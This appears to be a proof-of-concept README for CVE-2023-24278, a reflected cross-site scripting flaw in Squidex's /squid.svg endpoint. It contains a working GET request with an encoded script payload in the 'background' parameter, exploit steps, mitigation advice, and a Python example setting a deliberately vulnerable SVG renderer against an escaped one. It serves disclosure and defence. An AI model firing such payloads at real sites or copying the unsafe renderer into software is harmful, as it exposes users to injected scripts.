POC details: 5713e2122f5e32da053c58c05ed6a06a60a07a69

Source
Related vulnerability
Title: Squidex cross-site scripting vulnerability (CVE-2023-24278)
Description: Squidex is a headless CMS and content management hub. Squidex versions prior to 7.4.0 contain a security vulnerability that an attacker can exploit to carry out cross-site scripting attacks.
Description
Two reflected cross-site scripting (XSS) vulnerabilities were discovered in the Squidex open source headless CMS software. The reflected cross-site scripting vulnerabilities affect all versions of Squidex prior to 7.4.0 and affect both authenticated and unauthenticated victim users.
Introduction
# CVE-2023-24278 - Reflected XSS Vulnerabilities in Squidex

## Overview
**CVE ID:** [CVE-2023-24278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24278)  
**Affected Products:** Squidex versions prior to 7.4.0  
**Reported By:** Ioannis Christodoulakos  

This repository provides information and an exploit for two Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in the Squidex open-source headless CMS software. These vulnerabilities affect all versions prior to 7.4.0 and enable attackers to execute malicious JavaScript code in victim browsers by embedding code into specific query parameters of the `/squid.svg` endpoint.

## Vulnerability Details
The vulnerabilities exist due to improper sanitization of user-supplied input in the `text` and `background` parameters of the `/squid.svg` endpoint. Malicious input passed to these parameters is embedded directly into an auto-generated SVG image, which is then reflected back to the user's browser. This allows attackers to inject and execute arbitrary JavaScript code.

## Exploit CVE-2023-24278
Below is a proof-of-concept (PoC) exploit demonstrating how the vulnerability can be exploited via the `background` parameter.

### Exploit Steps
1. Send the following malicious GET request to the vulnerable endpoint:

   **Exploiting `background` Parameter:**
   ```http
   GET /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cimg%20src=%22&small HTTP/2
   ```

2. The server will respond with an SVG image containing the injected JavaScript code.

3. When the victim clicks on the malicious link, the JavaScript code will execute in their browser.

---

## Mitigation
To address this issue:
1. **Upgrade to Squidex 7.4.0 or newer.**
2. Validate and sanitize all user-supplied input before embedding it into dynamically generated SVG files.
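The unsafe concatenation described under Vulnerability Details, placed beside the escaping and allow-listing that mitigation step 2 calls for, as an added Python example. This is not Squidex's own code: the SVG template shape, the parameter names `title`, `text` and `background`, and the colour pattern are assumptions; the only input taken from the page is the `background` payload from the PoC request, URL-decoded.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

SVG_NS = "http://www.w3.org/2000/svg"

# URL-decoded `background` value from the PoC request above (constructed test input).
POC_BACKGROUND = '"><script>alert(1)</script><img src="'


def render_svg_unsafe(title: str, text: str, background: str) -> str:
    """Vulnerable pattern (assumed template): query values are concatenated
    straight into the markup, so a quote in `background` closes the attribute
    and the rest of the value becomes new elements."""
    return (
        f'<svg xmlns="{SVG_NS}" width="400" height="200">'
        f'<rect width="100%" height="100%" fill="{background}"/>'
        f'<text x="20" y="60">{title}</text>'
        f'<text x="20" y="120">{text}</text>'
        '</svg>'
    )


def render_svg_safe(title: str, text: str, background: str) -> str:
    """Hardened form: every untrusted value is escaped for its XML context.
    quoteattr() wraps the value in quotes and escapes & < > (and " when
    needed) so it can never close the attribute; escape() handles & < >
    for text nodes."""
    return (
        f'<svg xmlns="{SVG_NS}" width="400" height="200">'
        f'<rect width="100%" height="100%" fill={quoteattr(background)}/>'
        f'<text x="20" y="60">{escape(title)}</text>'
        f'<text x="20" y="120">{escape(text)}</text>'
        '</svg>'
    )


# Allow-list for the fill value: a short hex colour or a bare colour name.
# (Assumed pattern; a fill never needs angle brackets or quotes.)
_COLOR_RE = re.compile(r'^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$')


def is_plausible_color(value: str) -> bool:
    """Validation step: reject anything that does not look like a colour
    before it reaches the template at all."""
    return bool(_COLOR_RE.match(value))


def contains_script(svg: str) -> bool:
    """Textual check used to compare the two renderers' output."""
    return '<script' in svg.lower()


def parsed_fill(svg: str) -> str:
    """Parse the SVG as XML and return the rect's fill attribute.
    Raises xml.etree.ElementTree.ParseError if the document is malformed."""
    root = ET.fromstring(svg)
    rect = root.find(f'{{{SVG_NS}}}rect')
    return rect.get('fill')


if __name__ == '__main__':
    print(render_svg_safe('Not Found',
                          'This is not the page you are looking for!',
                          POC_BACKGROUND))
```

The escaped renderer round-trips the payload as inert attribute data (the parsed `fill` value equals the input string, with no `<script>` element in the tree), while the allow-list check rejects it outright; in a real endpoint both steps belong together, validation first and context-aware escaping as the backstop.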

For more details, refer to the [official advisory](https://census-labs.com/news/2023/03/16/reflected-xss-vulnerabilities-in-squidex-squidsvg-endpoint/).

File snapshot

[4.0K] /data/pocs/5713e2122f5e32da053c58c05ed6a06a60a07a69
└── [2.0K] README.md

0 directories, 1 file